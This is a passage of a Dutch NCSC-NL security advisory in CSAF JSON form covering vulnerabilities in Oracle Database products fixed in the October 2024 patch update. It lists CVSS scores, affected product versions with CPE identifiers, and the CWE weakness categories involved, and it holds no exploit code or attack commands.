cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*
|
— | |
|
database_-_core
oracle
|
cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*
|
— |
7.3 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*
|
— |
References
105 references
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Oracle heeft kwetsbaarheden verholpen in diverse Database producten en subsystemen, zoals de Core database, Application Express, Autonomous Health Framework, Essbase, GoldenGate, SQL Developer en Secure Backup.",
"title": "Feiten"
},
{
"category": "description",
"text": "Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorie\u00ebn schade:\n\n- Denial-of-Service (DoS)\n- Manipuleren van data\n- Toegang tot gevoelige gegevens",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Oracle heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "general",
"text": "Observable Timing Discrepancy",
"title": "CWE-208"
},
{
"category": "general",
"text": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)",
"title": "CWE-776"
},
{
"category": "general",
"text": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
"title": "CWE-88"
},
{
"category": "general",
"text": "Improper Handling of Exceptional Conditions",
"title": "CWE-755"
},
{
"category": "general",
"text": "Excessive Iteration",
"title": "CWE-834"
},
{
"category": "general",
"text": "Inefficient Algorithmic Complexity",
"title": "CWE-407"
},
{
"category": "general",
"text": "Improper Handling of Case Sensitivity",
"title": "CWE-178"
},
{
"category": "general",
"text": "Incorrect Permission Assignment for Critical Resource",
"title": "CWE-732"
},
{
"category": "general",
"text": "Double Free",
"title": "CWE-415"
},
{
"category": "general",
"text": "Missing Encryption of Sensitive Data",
"title": "CWE-311"
},
{
"category": "general",
"text": "Uncontrolled Search Path Element",
"title": "CWE-427"
},
{
"category": "general",
"text": "Encoding Error",
"title": "CWE-172"
},
{
"category": "general",
"text": "Integer Overflow to Buffer Overflow",
"title": "CWE-680"
},
{
"category": "general",
"text": "Untrusted Search Path",
"title": "CWE-426"
},
{
"category": "general",
"text": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)",
"title": "CWE-843"
},
{
"category": "general",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
},
{
"category": "general",
"text": "Insufficient Verification of Data Authenticity",
"title": "CWE-345"
},
{
"category": "general",
"text": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"title": "CWE-77"
},
{
"category": "general",
"text": "Observable Discrepancy",
"title": "CWE-203"
},
{
"category": "general",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "general",
"text": "Files or Directories Accessible to External Parties",
"title": "CWE-552"
},
{
"category": "general",
"text": "Authorization Bypass Through User-Controlled Key",
"title": "CWE-639"
},
{
"category": "general",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "CWE-275",
"title": "CWE-275"
},
{
"category": "general",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "general",
"text": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
"title": "CWE-119"
},
{
"category": "general",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "general",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
},
{
"category": "general",
"text": "Use After Free",
"title": "CWE-416"
},
{
"category": "general",
"text": "Missing Release of Memory after Effective Lifetime",
"title": "CWE-401"
},
{
"category": "general",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
},
{
"category": "general",
"text": "Improper Certificate Validation",
"title": "CWE-295"
},
{
"category": "general",
"text": "Exposure of Resource to Wrong Sphere",
"title": "CWE-668"
},
{
"category": "general",
"text": "Inclusion of Functionality from Untrusted Control Sphere",
"title": "CWE-829"
},
{
"category": "general",
"text": "Use of a Broken or Risky Cryptographic Algorithm",
"title": "CWE-327"
},
{
"category": "general",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "general",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "general",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "general",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "general",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "general",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "general",
"text": "Incorrect Conversion between Numeric Types",
"title": "CWE-681"
},
{
"category": "general",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
},
{
"category": "general",
"text": "Improper Privilege Management",
"title": "CWE-269"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Improper Neutralization of Alternate XSS Syntax",
"title": "CWE-87"
},
{
"category": "general",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "general",
"text": "CWE-18",
"title": "CWE-18"
},
{
"category": "general",
"text": "Covert Timing Channel",
"title": "CWE-385"
},
{
"category": "general",
"text": "Unchecked Input for Loop Condition",
"title": "CWE-606"
},
{
"category": "general",
"text": "Integer Coercion Error",
"title": "CWE-192"
},
{
"category": "general",
"text": "Detection of Error Condition Without Action",
"title": "CWE-390"
},
{
"category": "general",
"text": "Improperly Controlled Sequential Memory Allocation",
"title": "CWE-1325"
},
{
"category": "general",
"text": "Truncation of Security-relevant Information",
"title": "CWE-222"
},
{
"category": "general",
"text": "Incorrect Calculation of Buffer Size",
"title": "CWE-131"
},
{
"category": "general",
"text": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
"title": "CWE-59"
},
{
"category": "general",
"text": "Missing Critical Step in Authentication",
"title": "CWE-304"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference - cveprojectv5; hkcert; nvd; oracle; redhat",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html"
}
],
"title": "Kwetsbaarheden verholpen in Oracle Database producten",
"tracking": {
"current_release_date": "2024-10-17T13:15:19.595269Z",
"id": "NCSC-2024-0411",
"initial_release_date": "2024-10-17T13:15:19.595269Z",
"revision_history": [
{
"date": "2024-10-17T13:15:19.595269Z",
"number": "0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "database_-_grid",
"product": {
"name": "database_-_grid",
"product_id": "CSAFPID-1673504",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_grid:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_grid",
"product": {
"name": "database_-_grid",
"product_id": "CSAFPID-1673506",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_grid:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_core",
"product": {
"name": "database_-_core",
"product_id": "CSAFPID-1673386",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_core:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_core",
"product": {
"name": "database_-_core",
"product_id": "CSAFPID-1673385",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_core:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_core",
"product": {
"name": "database_-_core",
"product_id": "CSAFPID-1673442",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_core:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_security",
"product": {
"name": "database_-_security",
"product_id": "CSAFPID-1673507",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_security:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_security",
"product": {
"name": "database_-_security",
"product_id": "CSAFPID-1673509",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_security:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_security",
"product": {
"name": "database_-_security",
"product_id": "CSAFPID-1673508",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_security:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph_mapviewer",
"product": {
"name": "spatial_and_graph_mapviewer",
"product_id": "CSAFPID-912561",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph",
"product": {
"name": "spatial_and_graph",
"product_id": "CSAFPID-764250",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph",
"product": {
"name": "spatial_and_graph",
"product_id": "CSAFPID-1673511",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph",
"product": {
"name": "spatial_and_graph",
"product_id": "CSAFPID-1673512",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph",
"product": {
"name": "spatial_and_graph",
"product_id": "CSAFPID-816800",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "spatial_and_graph",
"product": {
"name": "spatial_and_graph",
"product_id": "CSAFPID-1673529",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:spatial_and_graph:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "fleet_patching_and_provisioning_-_micronaut",
"product": {
"name": "fleet_patching_and_provisioning_-_micronaut",
"product_id": "CSAFPID-1673492",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:fleet_patching_and_provisioning_-_micronaut:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "fleet_patching_and_provisioning",
"product": {
"name": "fleet_patching_and_provisioning",
"product_id": "CSAFPID-1503603",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_xml_database",
"product": {
"name": "database_-_xml_database",
"product_id": "CSAFPID-1673445",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_xml_database:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_xml_database",
"product": {
"name": "database_-_xml_database",
"product_id": "CSAFPID-1673443",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_xml_database:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_xml_database",
"product": {
"name": "database_-_xml_database",
"product_id": "CSAFPID-1673444",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_xml_database:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_java_vm",
"product": {
"name": "database_-_java_vm",
"product_id": "CSAFPID-1673451",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_java_vm:19.3-19.24:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_java_vm",
"product": {
"name": "database_-_java_vm",
"product_id": "CSAFPID-1673450",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_java_vm:21.3-21.15:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "database_-_java_vm",
"product": {
"name": "database_-_java_vm",
"product_id": "CSAFPID-1673452",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:database_-_java_vm:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "autonomous_health_framework",
"product": {
"name": "autonomous_health_framework",
"product_id": "CSAFPID-816798",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "autonomous_health_framework",
"product": {
"name": "autonomous_health_framework",
"product_id": "CSAFPID-816799",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "autonomous_health_framework",
"product": {
"name": "autonomous_health_framework",
"product_id": "CSAFPID-1673525",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:autonomous_health_framework:prior_to_24.9:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-912046",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-1503299",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-816855",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-816361",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-912045",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-1503302",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-912044",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-1503306",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-816852",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-912600",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-816853",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-912601",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "graalvm_for_jdk",
"product": {
"name": "graalvm_for_jdk",
"product_id": "CSAFPID-816854",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sqlcl",
"product": {
"name": "sqlcl",
"product_id": "CSAFPID-816801",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "sqlcl",
"product": {
"name": "sqlcl",
"product_id": "CSAFPID-1673405",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:sqlcl:23.4-23.5:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express_administration",
"product": {
"name": "application_express_administration",
"product_id": "CSAFPID-764731",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express_customers_plugin",
"product": {
"name": "application_express_customers_plugin",
"product_id": "CSAFPID-764732",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express_team_calendar_plugin",
"product": {
"name": "application_express_team_calendar_plugin",
"product_id": "CSAFPID-764733",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express",
"product": {
"name": "application_express",
"product_id": "CSAFPID-266119",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express",
"product": {
"name": "application_express",
"product_id": "CSAFPID-1673510",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express:23.1:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express",
"product": {
"name": "application_express",
"product_id": "CSAFPID-1503575",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "application_express",
"product": {
"name": "application_express",
"product_id": "CSAFPID-1673188",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:application_express:24.1:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "autonomous_health_framework",
"product": {
"name": "autonomous_health_framework",
"product_id": "CSAFPID-765238",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:autonomous_health_framework:19c:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "autonomous_health_framework",
"product": {
"name": "autonomous_health_framework",
"product_id": "CSAFPID-765239",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:autonomous_health_framework:21c:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "blockchain_platform",
"product": {
"name": "blockchain_platform",
"product_id": "CSAFPID-764779",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "blockchain_platform",
"product": {
"name": "blockchain_platform",
"product_id": "CSAFPID-89587",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-765259",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:_security_and_provisioning___21.3:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-187448",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.3:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-94075",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-220886",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-611394",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-816317",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-912567",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-1503612",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "essbase",
"product": {
"name": "essbase",
"product_id": "CSAFPID-1673479",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "oracle_essbase",
"product": {
"name": "oracle_essbase",
"product_id": "CSAFPID-1650506",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:oracle_essbase:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_big_data_and_application_adapters",
"product": {
"name": "goldengate_big_data_and_application_adapters",
"product_id": "CSAFPID-816845",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_big_data_and_application_adapters",
"product": {
"name": "goldengate_big_data_and_application_adapters",
"product_id": "CSAFPID-1650825",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:19.1.0.0.0-19.1.0.0.18:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_big_data_and_application_adapters",
"product": {
"name": "goldengate_big_data_and_application_adapters",
"product_id": "CSAFPID-1673404",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_big_data_and_application_adapters",
"product": {
"name": "goldengate_big_data_and_application_adapters",
"product_id": "CSAFPID-1650831",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:21.3-21.14.0.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_big_data",
"product": {
"name": "goldengate_big_data",
"product_id": "CSAFPID-764274",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_stream_analytics",
"product": {
"name": "goldengate_stream_analytics",
"product_id": "CSAFPID-764752",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_stream_analytics",
"product": {
"name": "goldengate_stream_analytics",
"product_id": "CSAFPID-1673384",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_stream_analytics",
"product": {
"name": "goldengate_stream_analytics",
"product_id": "CSAFPID-220192",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_stream_analytics",
"product": {
"name": "goldengate_stream_analytics",
"product_id": "CSAFPID-220193",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.7:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_studio",
"product": {
"name": "goldengate_studio",
"product_id": "CSAFPID-816846",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_studio",
"product": {
"name": "goldengate_studio",
"product_id": "CSAFPID-611390",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_studio",
"product": {
"name": "goldengate_studio",
"product_id": "CSAFPID-764803",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate_veridata",
"product": {
"name": "goldengate_veridata",
"product_id": "CSAFPID-764275",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-342816",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "goldengate",
"product": {
"name": "goldengate",
"product_id": "CSAFPID-1650767",
"product_identification_helper": {
